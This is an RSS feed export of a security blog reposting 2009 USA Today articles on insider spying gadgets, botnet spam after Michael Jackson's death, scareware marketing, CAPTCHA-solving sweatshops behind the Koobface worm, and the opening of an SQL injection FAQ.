<p>The basics include taking stock of how sensitive information is conveyed, collected and stored &#8211; and strictly controlling who has access to it. &#8220;We&#8217;re seeing 70% to 80% of breaches originating from the inside,&#8221; says Vladimir Chernavsky, president of DeviceLock, which makes systems that restrict data transfers. &#8220;Companies need to enforce security policies and make sure employees know there are severe consequences to a breach.&#8221;</p>
<p>Spy toys</p>
<p>And then there are the janitors and groundskeepers to worry about, says J.D. LeaSure, a Virginia Beach counter-surveillance specialist. LeaSure makes his living conducting &#8220;sweeps&#8221; that ferret out miniature listening bugs and video cameras hidden in executive suites, conference rooms and other settings.</p>
<p>Insider intruders, he says, have come to see value in making audio and video recordings of certain closed-door discussions. They need only do a Web search on the phrase &#8220;spy bug,&#8221; and a trove of eavesdropping and peeping-Tom gadgetry that would impress James Bond turns up. LeaSure calls them &#8220;spy-shop toys.&#8221;</p>
<p>One of the latest: an ordinary-looking USB cable. You plug one end into a printer or other peripheral device and the other end into the computer&#8217;s USB port. Nothing looks amiss, and the cable operates normally. But it also houses a sensitive microphone and antenna that continually transmits a UHF audio signal to a receiver that can be up to 160 feet away. &#8220;You can hear every whisper within the confines of the room,&#8221; says LeaSure.</p>
<p>There are dime-size &#8220;contact bugs,&#8221; which anyone could stick to the outside of a conference room window and matchbox-size &#8220;SIM bugs,&#8221; or listen-only cellphones that don&#8217;t ring or light up, that can be activated by a phone call an hour, a week or a month later.</p>
<p>Another readily available gadget looks like a luminescent jawbreaker. It is really a motion-activated video camera and digital video recorder capable of capturing 33 hours of activity. All one needs to do is perch it where it won&#8217;t be noticed on a Monday and retrieve it on a Friday.</p>
<p>LeaSure recently did a security sweep of the CEO&#8217;s office at a publicly traded corporation in the Southeast, which he declined to name because of client confidentiality. There, he found an innocuous-looking ballpoint pen in a cup with a handful of other pens and pencils. The pen wrote beautifully. It also contained a voice-activated audio recorder with 2 gigabytes of memory.</p>
<p>LeaSure set up a hidden surveillance camera and caught the janitor swapping out a fresh pen recorder every third day. The janitor was fired, with no other repercussions, after disclosing the identity of the insider who put her up to it.</p>
<p>That person stopped spying after being threatened with legal action, says LeaSure, but nothing else was done. &#8220;The principal did not want the stockholders or press getting a hold of the fact that company secrets were leaked because of what that would do to the company&#8217;s stock price,&#8221; he says.</p>
]]></content:encoded>
			<wfw:commentRss>http://lastwatchdog.com/insider-intrusions-escalate-simple-attacks-methods/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Michael Jackson spam spike illustrates botnet infrastructure at work</title>
		<link>http://lastwatchdog.com/michael-jackson-spam-spike-illustrates-botnet-infrastructure/</link>
		<comments>http://lastwatchdog.com/michael-jackson-spam-spike-illustrates-botnet-infrastructure/#comments</comments>
		<pubDate>Wed, 29 Jul 2009 19:23:22 +0000</pubDate>
		<dc:creator>bacohido</dc:creator>
				<category><![CDATA[For consumers]]></category>
		<category><![CDATA[For technologists]]></category>
		<category><![CDATA[Imminent threats]]></category>
		<category><![CDATA[Top Stories]]></category>
		<category><![CDATA[USAToday stories]]></category>

		<guid isPermaLink="false">http://lastwatchdog.com/?p=2408</guid>
		<description><![CDATA[The spike in spam campaigns that began within hours after Michael Jackson&#8217;s death hit headlines on June 25th really was not much different than spam waves following the election of President Obama, the outbreak of swine flu and the death of numerous celebrities.
My story delineates how botnet controllers of Waledac, Rustock and Pushdo executed textbook [...]]]></description>
			<content:encoded><![CDATA[<p>The spike in spam campaigns that began within hours after Michael Jackson&#8217;s death hit headlines on June 25th really was not much different than spam waves following the election of President Obama, the outbreak of swine flu and the death of numerous celebrities.</p>
<p>My story delineates how botnet controllers of Waledac, Rustock and Pushdo executed textbook attacks. You can see the story <a href="http://www.usatoday.com/tech/news/2009-07-28-spam-michael-jackson_N.htm">here,</a> or read it below:</p>
<p><img class="alignleft size-full wp-image-2410" title="090729_michaeljackson3b-450" src="http://lastwatchdog.com/wp/wp-content/uploads/090729_michaeljackson3b-450.jpg" alt="090729_michaeljackson3b-450" width="450" height="356" />USA TODAY</p>
<p>July 29, 2009</p>
<p><strong>Spammers got busy when Michael Jackson died</strong></p>
<p>By Byron Acohido, USA TODAY</p>
<p>LAS VEGAS &#8211; When Michael Jackson died on June 25, his fans mourned &#8211; and cybercriminals swung into action.</p>
<p>Within 38 hours, they forged alliances with familiar partners to trigger global spam campaigns that capitalized on the singer&#8217;s death.</p>
<p>That was a potent reminder of the dangers that computer-savvy lawbreakers pose in a world that increasingly depends on the Internet for communications and commerce.</p>
<p>&#8220;Cybercriminals hunt prey with a velocity that&#8217;s impossible for legitimate businesses to match,&#8221; says Patrick Peterson, Cisco chief security officer.</p>
<p>The attacks after Jackson&#8217;s death will be fresh on the minds of about 4,000 corporate managers gathering Wednesday to discuss cybercrime defenses at the annual Black Hat Vegas security conference.</p>
<p>&#8220;The bad guys are very adept at using Internet technologies,&#8221; says Dave Marcus, director of research and communications at anti-virus firm McAfee. &#8220;And unlike the good guys, they aren&#8217;t restrained by any laws or jurisdictional boundaries.&#8221;</p>
<p>Like most large-scale cyberattacks, the Jackson spamming runs were carried out by about a dozen elite crime gangs. Each controls networks of hundreds of thousands of infected home and workplace PCs, called bots, which they lease to clients who want to carry out scams.</p>
<p>Longstanding clients include sellers of non-certified pharmaceutical drugs, herbal remedies, replica designer goods and worthless anti-virus subscriptions. Their hard drives brim with e-mail and website marketing material and software to carry out online sales.</p>
<p>They attract attention by referring to headline news, including the election of President Obama, the swine flu outbreak &#8211; and celebrity deaths.</p>
<p>&#8220;They have templates ready so all they have to do is plug in words relating to a specific event,&#8221; says John Harrison, director of Symantec&#8217;s security response team.</p>
<p>So they were all set on the Thursday afternoon when news about Jackson&#8217;s death began to spread.</p>
<p>Trolling for hot topics</p>
<p>&#8220;These groups monitor news outlets, Twitter and other social-media sites to discover hot topics,&#8221; says Jose Nazario, manager of security research at Web security firm Arbor Networks.</p>
<p>Within a few hours, a smattering of amateurish spamming attacks began to appear. But the serious botnet gangs and cyberscammers took a little more time to coordinate large-scale campaigns.</p>
<p>By dawn on Saturday, a top botnet gang, Waledac, had a client: a well-known online drug retailer, GlavMed.com, also known as Canadian Pharmacy, Cisco senior researcher Henry Stern says.</p>
<p>The Waledac gang began deploying thousands of bots to spam out millions of e-mails with Web links purportedly leading to news about Jackson, he says. But the links actually redirected recipients to websites affiliated with GlavMed that sold sexual-performance drugs and pain killers.</p>
<p>A few hours later, another major botnet gang, known as Rustock, also blasted out Jackson-themed spam for GlavMed&#8217;s online shopping sites.</p>
<p>&#8220;Rustock is run by a different group of criminals, but here it was spamming the same e-mails as Waledac on behalf of a common client,&#8221; Peterson says.</p>
<p>A week after Jackson&#8217;s death, criminals out to steal sensitive data or hijack online financial accounts began to move in. A major botnet gang called Pushdo launched a large-scale spamming campaign with enticing messages including: &#8220;Who killed Michael Jackson? Visit X-Files to see the answer.&#8221; A Web link followed.</p>
<p>Clicking on it triggered what&#8217;s known as a &#8220;drive-by download.&#8221; The attacking bot scans for security holes in popular applications such as Internet Explorer, QuickTime and Adobe Acrobat Reader.</p>
<p>Breaking in</p>
<p>When it finds one, it swiftly secures access to the heart of the operating system, giving botnet controllers an opening to install any programs they want, including one called a root kit that makes the opening permanent.</p>
<p>Pushdo&#8217;s client also paid the gang to install a customized version of a malicious tool, called Zbot, that watches for when the PC user logs on to any banking website. Zbot then steals the user name and password and forwards it to the client.</p>
<p>As with most drive-by downloads, the Pushdo gang got a bonus. The opening created by the bot remained in place after the client&#8217;s work was done, giving the gang another bot for hire.</p>
<p>&#8220;This was just another routine spam campaign by Pushdo, but it had a malicious twist,&#8221; says Phil Hay, lead threat analyst at security firm Marshal8e6.</p>
<p>Find this article at:</p>
<p>http://www.usatoday.com/tech/news/2009-07-28-spam-michael-jackson_N.htm</p>
]]></content:encoded>
			<wfw:commentRss>http://lastwatchdog.com/michael-jackson-spam-spike-illustrates-botnet-infrastructure/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>How the proliferation of &#8216;scareware&#8217; fuels cybercrime</title>
		<link>http://lastwatchdog.com/proliferation-scareware-fuels-cybercrime/</link>
		<comments>http://lastwatchdog.com/proliferation-scareware-fuels-cybercrime/#comments</comments>
		<pubDate>Wed, 10 Jun 2009 07:15:05 +0000</pubDate>
		<dc:creator>bacohido</dc:creator>
				<category><![CDATA[Imminent threats]]></category>
		<category><![CDATA[USAToday stories]]></category>

		<guid isPermaLink="false">http://lastwatchdog.com/?p=2012</guid>
		<description><![CDATA[By Byron Acohido, USA TODAY
Scareware has become the scourge of the Internet.
Find initial version of this article here.
Those deceptive promotions crafted to panic you into spending $30 to $80 for worthless antivirus protection can hit you just about anywhere you turn on the Web. They arrive as booby-trapped Web links in e-mail and social network [...]]]></description>
			<content:encoded><![CDATA[<p>By Byron Acohido, USA TODAY<br />
Scareware has become the scourge of the Internet.</p>
<p>Find initial version of this article <a href="http://www.usatoday.com/tech/news/2009-06-09-cybergangs-scareware-hackers_N.htm">here.</a></p>
<p><img class="alignleft size-full wp-image-2013" title="090610_scareware" src="http://lastwatchdog.com/wp/wp-content/uploads/090610_scareware.jpg" alt="090610_scareware" width="300" height="363" />Those deceptive promotions crafted to panic you into spending $30 to $80 for worthless antivirus protection can hit you just about anywhere you turn on the Web. They arrive as booby-trapped Web links in e-mail and social network messages. They lurk hidden, and set to activate, when you click to popular, legitimate websites.</p>
<p>BLOG: Twitter used to spread scareware</p>
<p>And now scareware purveyors are embedding triggers in places you wouldn&#8217;t expect: on advertisements displayed at mainstream media websites; amid search results from Google, Yahoo Search and Windows Live search; alongside comments posted on YouTube videos; and, most recently, in &#8220;tweets&#8221; circulating on Twitter.</p>
<p>&#8220;Scareware is becoming a dominating force,&#8221; says Joe Stewart, director of SecureWorks Counter Threat Unit. &#8220;There are hundreds of criminals using every tactic they can think of to push these programs.&#8221;</p>
<p>Click on a trigger and you&#8217;ll get caught in an unnerving loop impossible to abort. A scanner window will appear with red-letter warnings listing viruses purportedly infesting your hard drive. A series of dialogue boxes will follow giving you choices that all lead to the same screen: a sales pitch.</p>
<p>Make the purchase, and you get a bogus inoculation. Try to cancel it, and you&#8217;ll get repeated offers. &#8220;It&#8217;s like stepping into quicksand,&#8221; says Paul Royal, senior researcher at security firm Purewire. &#8220;The more you try to get out of it, the deeper you sink.&#8221;</p>
<p>Scareware has been a prominent part of the Internet since 2004, when a cybergang based in St. Petersburg, Russia, launched the iframecash.biz website and began offering commissions to anyone who helped them spread the SpySheriff fake antivirus program. Hackers began to taint legitimate websites so that pop-up ads for SpySheriff would launch on the PC of anyone who visited a corrupted Web page.</p>
<p>That simple arrangement has evolved into a steadily growing industry that marked a banner year in 2008. By late last year, more than 9,200 different types of scareware programs were circulating on the Internet, up from 2,800 at midyear, according to The Anti-Phishing Working Group. Microsoft recently reported that scareware infections rose 48% in the second half of 2008 vs. the first half. Microsoft analyzed data collected by use of its Malicious Software Removal Tool and found one specific fake security program on 4.4 million PCs.</p>
<p>&#8220;These guys are very innovative,&#8221; says Roel Schouwenberg, senior virus researcher at Kaspersky Lab. &#8220;They&#8217;re constantly looking for newer and easier ways to make money.&#8221;</p>
<p>Cutting-edge scareware marketing campaigns are being delivered via:</p>
<p>• YouTube and Twitter. The bad guys sign up for a handful of new YouTube or Twitter accounts. In the case of YouTube, crooks recently used about a dozen new accounts to begin posting comments on 30,000 videos, says Luis Corrons, technical director of PandaLabs. The comments enticed users to click on a link that triggered a scareware promotion.</p>
<p>In a variation of this ploy, crooks in late May created new Twitter accounts and began broadcasting tweets declaring &#8220;Best video&#8221; with a Web link of http://juste.ru, says Schouwenberg. Clicking on the link launched a sequence that replicated the message to everyone on the victim&#8217;s friends list, then launched a scareware promo.</p>
<p>• Search results. The bad guys create malicious Web pages and fill them with words and phrases that are likely to be popular search queries, such as &#8220;American Idol winner&#8221; or &#8220;NCAA tournament bracket,&#8221; says Yuval Ben-Itzhak, CTO of security firm Finjan. Next they insert tiny copies of their bad links on popular, legit websites that don&#8217;t do a thorough job of preventing such hacks.</p>
<p>&#8220;Search engine optimization&#8221; then takes over. SEO is the technology that determines the relevance of Web links to search queries. By embedding a malicious link on a popular website, the hackers imbue their Web page with high relevance. So when the legit site turns up as the No. 1 or No. 2 result for a popular search query, their bad link turns up as the No. 4 or No. 6 result. Anyone who clicks on the bad link gets a scareware pitch.</p>
<p>• Online ads. The bad guys purchase blocks of ad space on popular websites through a legit ad agency, says Roger Thompson, senior researcher at AVG. Next they instruct the ad agency to begin posting innocuous ads. To avoid detection, they only sporadically feed a corrupted ad into the mix. The bad ad looks safe, but carries instructions to route anyone who clicks to a scareware pitch. &#8220;It&#8217;s the most common attack we see every day,&#8221; Thompson says.</p>
<p>Mind-boggling profits</p>
<p>Powerful incentives undergird scareware. Security researchers say the industry is run by no more than a dozen or so top-level suppliers orchestrating the activity of several hundred &#8220;affiliate&#8221; distributors.</p>
<p>The top-level groups supply bogus scanners and cleanup tools &#8211; actual software &#8211; and collect payments and pay commissions. Bonuses can be generous. One top supplier, for instance, recently ran a contest offering a $36,000 Lexus sedan to the top-selling affiliate, says F-Secure senior researcher Mikko Hypponen.</p>
<p>&#8220;The top-level groups incentivize the affiliates and don&#8217;t get their hands dirty,&#8221; says Hypponen. &#8220;If they get any complaints, they can just blame the affiliate.&#8221;</p>
<p>Top-level groups typically work with 100 or more affiliates, who can earn commissions many different ways. Last fall, SecureWorks researcher Stewart infiltrated a Russian group known as the Baka Software gang. He accessed documentation showing one affiliate earned $146,525 in 10 days by spreading promotions for a worthless program, called Antivirus XP 2008, to more than 154,000 people, and closing sales to 2,772 of them. Another record showed five top Baka Software affiliates earning weekly commissions averaging $107,604.</p>
<p>&#8220;The sheer amounts of money involved in installing just one rogue program are mind-boggling,&#8221; Stewart says.</p>
<p>A few scareware affiliates have been slowed by regulators. Last fall, Microsoft and Washington state Attorney General Rob McKenna filed civil lawsuits against Branch Software, of The Woodlands, Texas, and Alpha Red, of Houston, charging that they were marketing scareware. And last December, the Federal Trade Commission obtained court orders prohibiting Innovative Marketing, of Belize, and ByteHosting Internet Services, of Cincinnati, from selling WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus, all worthless.</p>
<p>The top-level suppliers, however, continue to operate with impunity, mainly based in Russia. And new affiliates crop up every day, full of fresh ideas to spread increasingly invasive promotions, security researchers say.</p>
<p>Consumer trust at risk</p>
<p>In the past two months, AVG&#8217;s free LinkScanner tool, which prevents users from clicking on malicious Web links, has been flushing out &#8211; on a daily basis &#8211; more than 30,000 Web pages displaying ordinary-looking ads embedded with hidden scareware triggers. Earlier this year the daily average was roughly 5,000, Thompson says.</p>
<p>The tech giants supplying the infrastructure for Web commerce, and media and social-networking companies capitalizing on Web marketing, are cognizant of the threat posed by escalating scareware, says Mike Zaneis, vice president of public policy for the Interactive Advertising Bureau, a trade association, whose members include Google, Yahoo, Microsoft, Facebook, NBC, USA TODAY and The New York Times.</p>
<p>&#8220;The industry is very committed to combating these attacks, because consumer trust is vital for us to do business,&#8221; Zaneis says. &#8220;It&#8217;s what keeps people online.&#8221;</p>
<p>Yet affiliates continue to demonstrate remarkable ingenuity. Contaminating search results is a complex endeavor. The affiliate group infiltrated by Finjan demonstrated how SEO hacks can result in a high volume of promotions being launched. Over a 16-day period, the group corrupted some 500,000 legitimate Web pages, and got nearly 2 million people to click on tainted search results. &#8220;These cybercriminals are motivated by the huge amount of money they can make very quickly,&#8221; says Ben-Itzhak.</p>
<p>Google spokesman Andrew Kovacs says the search giant works hard to preserve the integrity of search results. &#8220;We make constant improvements to our systems,&#8221; Kovacs says. &#8220;This issue is not specific to one company, and we encourage people to be vigilant about checking the URLs (Web links) of the websites they visit.&#8221;</p>
<p>That&#8217;s good advice, since scareware purveyors have shown they will strike wherever consumers congregate in large numbers. Take the affiliates who spread booby-trapped Web links via Twitter in late May. Kaspersky researcher Schouwenberg says anyone who clicked on one of their tweeted links got hit with a particularly nasty program. It shut down &#8211; and locked out &#8211; all other software applications, and insisted on purchase of a two-year license, for $49.95, to unlock the other apps. A lifetime license cost $79.95. &#8220;They&#8217;re beginning to cripple machines to make it more likely that you will pay up,&#8221; he says.</p>
<p>Pressure for change is growing</p>
<p>As scareware continues to escalate, public pressure for relief from deceptive promotions will increase, predicts John Pironti, a member of the education committee of the Information Systems Audit and Control Association, a global organization of auditors and security pros.</p>
<p>Pironti, president of IP Architects, a risk-management consultancy, would like to see more public-awareness campaigns and tighter controls to curtail scareware.</p>
<p>&#8220;Commercial industry has pushed us to use the Internet more, and interact in person with them less,&#8221; he says. &#8220;So now they need to take on a bigger responsibility for making things safer.&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://lastwatchdog.com/proliferation-scareware-fuels-cybercrime/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How CAPTCHA solvers aid worm spreaders</title>
		<link>http://lastwatchdog.com/captcha-solvers-aid-worm-spreaders/</link>
		<comments>http://lastwatchdog.com/captcha-solvers-aid-worm-spreaders/#comments</comments>
		<pubDate>Fri, 24 Apr 2009 05:51:54 +0000</pubDate>
		<dc:creator>bacohido</dc:creator>
				<category><![CDATA[Imminent threats]]></category>
		<category><![CDATA[USAToday stories]]></category>

		<guid isPermaLink="false">http://lastwatchdog.com/?p=1984</guid>
		<description><![CDATA[April 23, 2009
By Byron Acohido, USA TODAY
See original version of story here.
SEATTLE &#8211; It&#8217;s become the new front in cybercrime: scams and identity-theft programs that attack e-mail accounts and users of social-networking sites such as Facebook and MySpace.
To carry out many of these automated attacks, cybercriminals first must overcome &#8220;captchas,&#8221; the distorted letters and characters [...]]]></description>
			<content:encoded><![CDATA[<p>April 23, 2009</p>
<p>By Byron Acohido, USA TODAY</p>
<p><em>See original version of story <a href="http://www.usatoday.com/tech/news/computersecurity/2009-04-22-captcha-code-breakers_N.htm">here.</a></em></p>
<p><img class="alignleft size-full wp-image-1993" title="090423_-captchas1a_cropa" src="http://lastwatchdog.com/wp/wp-content/uploads/090423_-captchas1a_cropa.jpg" alt="090423_-captchas1a_cropa" width="277" height="367" />SEATTLE &#8211; It&#8217;s become the new front in cybercrime: scams and identity-theft programs that attack e-mail accounts and users of social-networking sites such as Facebook and MySpace.</p>
<p>To carry out many of these automated attacks, cybercriminals first must overcome &#8220;captchas,&#8221; the distorted letters and characters that users of an e-mail or social-networking account are required to type to complete certain online forms. For years, captchas have helped to stop or bog down automated programs aimed at creating, among other things, e-mail accounts that promote scams such as fake computer virus protection and bogus accounts on social websites that can be used to collect personal information on legitimate users.</p>
<p>Now, security specialists say, a growing number of captcha-breaking groups are using real people to type in captcha responses for cybergangs around the world. This is allowing the gangs to create fake e-mail and social-network accounts by the tens of thousands &#8211; and use them as the starting point for a variety of cyberscams spread by e-mail and instant messages.</p>
<p>MySpace and Facebook say that, so far, they have kept such attacks largely in check. But security researchers say that as long as captchas are a key security feature on networking websites, cyberattacks on such sites are likely to intensify.</p>
<p>&#8220;We shouldn&#8217;t have any illusions about captchas,&#8221; says Sergei Shevchenko, a virus hunter at Internet security firm PC Tools. &#8220;If the professionals want to break in, they&#8217;ll do it.&#8221;</p>
<p>For social-networking sites that have exploded in popularity during the past two years &#8211; Facebook now claims more than 200 million members &#8211; the stakes are enormous.</p>
<p>The social networks, scrambling to build audiences and ad revenue, want to avoid e-mail&#8217;s fate: Today, 90% of all e-mail traffic is spam, and companies across the nation pour vast resources into keeping legitimate e-mail viable by filtering away spam.</p>
<p>Meanwhile, cybergangs recognize the opportunity to get fresh mileage from tried-and-true scams. They are repurposing ruses perfected in e-mail spamming to try to fool members of social networks into accepting &#8211; or even spreading &#8211; ads for fake products, data-stealing programs and other harmful computer bugs.</p>
<p>&#8220;Social-networking sites are a viral marketer&#8217;s dream,&#8221; says Paul Wood, analyst at Message Labs-Symantec, an Internet security firm. &#8220;The potential to tap into a huge community of like-minded individuals is enormous.&#8221;</p>
<p>A penny at a time</p>
<p>Captchas first appeared in 2001. They are based on the idea that humans &#8211; and not automated programs used by cybercriminals &#8211; can distinguish a word or group of characters shown as a warped graphical representation and then type them on an online form to gain access to a protected Web page.</p>
<p>Social networks typically require captchas for creating accounts and sending private messages that include Web links.</p>
<p>Captchas represent the first line of deterrence against automated programs, called bots, which typically are assembled in large groups known as botnets.</p>
<p>Bots are the little engines that propel online criminal activities. Bots, for example, are efficient at creating bogus Gmail, Hotmail, Yahoo and AOL messaging accounts, as well as memberships on MySpace, Facebook, Twitter and YouTube. These bogus accounts can serve as launching points to spread spam, steal data, pitch fake antivirus subscriptions &#8211; and scoop more PCs into the botnet.</p>
<p>Captcha designers have made their work increasingly distorted and camouflaged to defeat improved character-recognition programs carried by bots. Today, most major websites use advanced captchas that bots can&#8217;t resolve.</p>
<p>Enter captcha-breaking groups, bearing a new weapon that combines cheap labor with the Internet&#8217;s capacity for quick, anonymous global transactions.</p>
<p>Spawned in the online underground, these groups are difficult to pin down, security specialists say. But based on recruitment ads, discussions on hackers&#8217; forums and the rising volume of bogus accounts being created, there appear to be dozens of captcha-breaking gangs employing hundreds of people in several countries, tech security researchers say.</p>
<p>Human captcha-solvers work piecemeal. They have shown up in Internet cafes or in sweatshops filled with Internet-connected PCs in China, India, Russia, Brazil, Argentina and Nigeria, working long shifts deciphering streams of characters forwarded by an unseen coordinator, researchers say.</p>
<p>&#8220;At least one major operation is being run out of Pakistan,&#8221; says Adam O&#8217;Donnell, director of emerging technologies at messaging security firm Cloudmark. &#8220;I suspect similar operations are being run anywhere that has bandwidth and cheap labor.&#8221;</p>
<p>Cybergangs typically pay captcha-solvers a half-cent to a penny for every captcha they complete, according to online recruitment ads on hackers&#8217; forums that reflect how captcha-solving has become a growing underground business.</p>
<p>&#8220;You can pay a business for captcha-breaking services, and they&#8217;ll make it happen,&#8221; says Patrick Peterson, chief security researcher at Cisco. &#8220;You can have the captchas solved in the Internet cloud as you create each new account.&#8221;</p>
<p>Networks fight back</p>
<p>Without the emergence of for-hire captcha-breakers, a particularly destructive worm that plagued the Internet in May &#8211; known as Koobface &#8211; would not have been possible. A worm is a program designed to self-replicate across the Internet.</p>
<p>Koobface &#8211; a cockeyed spelling of Facebook &#8211; targeted MySpace and Facebook. It initiated messages that duped victims into clicking on a Web link to view a funny YouTube video.</p>
<p>Clicking on the link led to instructions to download a Flash Player update required to view the video. Clicking on the video player update downloaded a copy of the worm, which instantly searched out the victim&#8217;s friend lists on Facebook and MySpace and sent copies of itself to everyone on the list. So, subsequent victims received a message that actually arrived from the account of a trusted friend.</p>
<p>&#8220;This certainly represented the sullying of what began as a clear, worry-free place to interact with peers,&#8221; says Joel Smith, chief technology officer at messaging security firm AppRiver.</p>
<p>MySpace and Facebook scrambled to warn users about Koobface, block suspicious Web links and take other defensive measures.</p>
<p>&#8220;We&#8217;ve been working for months to limit the distribution of Koobface over Facebook,&#8221; says Facebook spokesman Barry Schnitt. &#8220;We take the security of our users very seriously and have invested significant resources in protecting them.&#8221;</p>
<p>MySpace Chief Security Officer Hemanshu Nigam says improved security has reduced spam that reaches the network&#8217;s members by 73% since Koobface first appeared. MySpace beefed up its message-filtering systems and developed a tool to warn members about suspicious links.</p>
<p>&#8220;We have put in a lot of features to cleanse things like Koobface,&#8221; Nigam says.</p>
<p>Researchers don&#8217;t know who created or controls Koobface, which continues to morph on the Web. In mid-March, Microsoft added Koobface detection to its Malicious Software Removal Tool (MSRT), which automatically checks PCs running non-pirated copies of Windows Vista, Windows XP, Windows 2000 and Windows Server 2003 for more than 100 viruses.</p>
<p>In the ensuing two weeks, MSRT removed Koobface nearly 200,000 times from 133,677 PCs.</p>
<p>&#8220;Koobface is constantly changing to avoid detection, with over 20,000 variations to date,&#8221; Jeff Williams, Microsoft Malware Protection Center program manager, said in a blog post. &#8220;We&#8217;re also working to detect new variants of the Koobface virus as they&#8217;re discovered, so we can provide ongoing protection from this threat.&#8221;</p>
<p>A &#8216;shark&#8217; in &#8216;warm waters&#8217;</p>
<p>Early versions of Koobface focused on spreading the worm far and wide.</p>
<p>Besides copying itself to everyone on victims&#8217; friend lists, the worm stole cookies &#8211; small pieces of text, stored in the users&#8217; Web browsers. But it stole only those cookies that contained user IDs and passwords for members of social-networking sites Friendster, BlackPlanet, Bebo, Hi5, LiveJournal and MyYearbook. That gave the attackers starting points to launch the worm in the more popular social networks, says Kurt Baumgartner, chief threat officer at PC Tools.</p>
<p>As Koobface steadily added capabilities, Baumgartner observed it begin to incorporate malicious programs widely used by other criminal groups:</p>
<ul>
<li>Adware for a $50 fake antivirus program, called Security Protect 2009, that&#8217;s now also being spread by the Conficker worm.</li>
<li>Coding that turns an infected PC into a spam-spreading bot, the same coding used by the huge Waledac e-mail virus.</li>
<li>A program called ZeuS that steals user IDs and passwords from a customizable list of banks.</li>
</ul>
<p>&#8220;Koobface is like a shark that has found itself in warm waters with plenty of prey,&#8221; Baumgartner says.</p>
<p>Shevchenko, a Russian expatriate and Baumgartner&#8217;s colleague, has been monitoring Koobface alongside him, and he made some startling discoveries about captcha breakers. Monitoring Russian-language forums, he found an ad headlined &#8220;Kolotibablo,&#8221; which means &#8220;make easy money.&#8221;</p>
<p>The job description as translated by Shevchenko: &#8220;Your new job is printing English text that you see in the pictures. (Images of captchas were shown.) All you need is to know the English alphabet and know where the keys are located on a keyboard. For every correctly entered word you will receive up to 1 cent, depending on the level that you have achieved. Your only limit is your typing speed. Every minute, you&#8217;ll be able to correctly type the text from 10 pictures on average. Thus, with an average price of 0.5 cent per one correctly typed text from a picture, your salary will be 3 US dollars per hour.&#8221;</p>
<p>Shevchenko conducted an experiment. First, he reverse-engineered Koobface to discover where the worm sent captchas to be resolved. Next, he generated and saved 100 captchas issued by Facebook, MySpace, Gmail, Yahoo Mail and Hotmail. And finally he built a tool that could submit the 100 captchas to Koobface&#8217;s resolvers.</p>
<p>Shevchenko&#8217;s findings, widely cited in tech security circles, astounded many of his peers, a band of about 200 or so elite virus hunters around the world. Two-thirds of the captchas came back resolved in less than 30 seconds. The unresolved words or characters were more highly distorted and thus more difficult to solve.</p>
<p>Some rejects came back with letters typed from one side of the keyboard, such as &#8220;asdfg,&#8221; indicating a human resolver was typing gibberish to quickly get to an easier puzzle. Shevchenko resubmitted the rejects, and eventually all 100 sample captchas were successfully resolved.</p>
<p>&#8220;I was just amazed with the effectiveness of the system,&#8221; Shevchenko says.</p>
<p>As a parting shot, Shevchenko submitted a captcha of his own composition to let the captcha-solvers know someone was on to them: &#8220;Don&#8217;t be a monkey respect yourself.&#8221;</p>
<p>The message came back solved in 23 seconds.</p>
<p>Find this article at:</p>
<p>http://www.usatoday.com/tech/news/computersecurity/2009-04-22-captcha-code-breakers_N.htm</p>
]]></content:encoded>
			<wfw:commentRss>http://lastwatchdog.com/captcha-solvers-aid-worm-spreaders/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FAQ: The rapid spread of SQL injection attacks</title>
		<link>http://lastwatchdog.com/faq-sql-injection-attacks/</link>
		<comments>http://lastwatchdog.com/faq-sql-injection-attacks/#comments</comments>
		<pubDate>Tue, 17 Mar 2009 19:50:30 +0000</pubDate>
		<dc:creator>bacohido</dc:creator>
				<category><![CDATA[For consumers]]></category>
		<category><![CDATA[For technologists]]></category>
		<category><![CDATA[Imminent threats]]></category>
		<category><![CDATA[Obama watch]]></category>
		<category><![CDATA[Steps forward]]></category>
		<category><![CDATA[Top Stories]]></category>
		<category><![CDATA[USAToday stories]]></category>
		<category><![CDATA[SQL injection]]></category>

		<guid isPermaLink="false">http://lastwatchdog.com/?p=1020</guid>
<description><![CDATA[A criminal hacker&#8217;s epiphany: Why not automate SQL injection attacks and use botnets to launch them?
That stroke of genius dawned on a criminal coder, possibly Chinese, a little less than a year ago. The result: in just 10 months, botnet-driven SQL injection attacks have been used to plant infections on multi-millions of webpages. These infections [...]]]></description>
<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1018" title="sql_img" src="http://lastwatchdog.com/wp/wp-content/uploads/sql_img.jpg" alt="sql_img" width="300" height="225" />A criminal hacker&#8217;s epiphany: Why not automate SQL injection attacks and use botnets to launch them?</p>
<p>That stroke of genius dawned on a criminal coder, possibly Chinese, a little less than a year ago. The result: in just 10 months, botnet-driven <a href="http://www.usatoday.com/tech/news/2009-03-16-sql-attacks-cyber-security_N.htm">SQL injection attacks </a>have been used to plant infections on multi-millions of webpages. These infections now lurk in wait for anyone who happens to click to what appears to be a reputable website.</p>
<p>Click on a tainted webpage and you won&#8217;t notice anything amiss. But here&#8217;s what happens next: A backdoor gets silently implanted on your hard drive. Through that backdoor the attacker will send coding that silently turns your machine into an obedient &#8220;bot.&#8221; Your botted PC <a href="http://lastwatchdog.com/botnet-scams-exploding/">gets slotted</a> into a bot network of 10,000 or more other bots.</p>
<p>As part of this botnet, your machine may be used to deploy spam, spread infections, steal data, launder stolen funds, participate in <a href="http://lastwatchdog.com/botnets-blackmail-targeted-sites/">extortionist denial of service</a> attacks or <a href="http://lastwatchdog.com/russian-pcs-cyberattack-georgia/">wage political warfare</a> against small nations. And for good measure: a data stealer will also get installed on your hard drive; it will clean out your email address book and buddy lists, thus converting all of your contacts into targets for similar infections. And henceforth any information you type at account logon pages, online banking forms, shopping carts &#8212; any webpage with a submit button &#8212; will get summarily harvested.</p>
<p><strong>History of SQL injection attacks</strong></p>
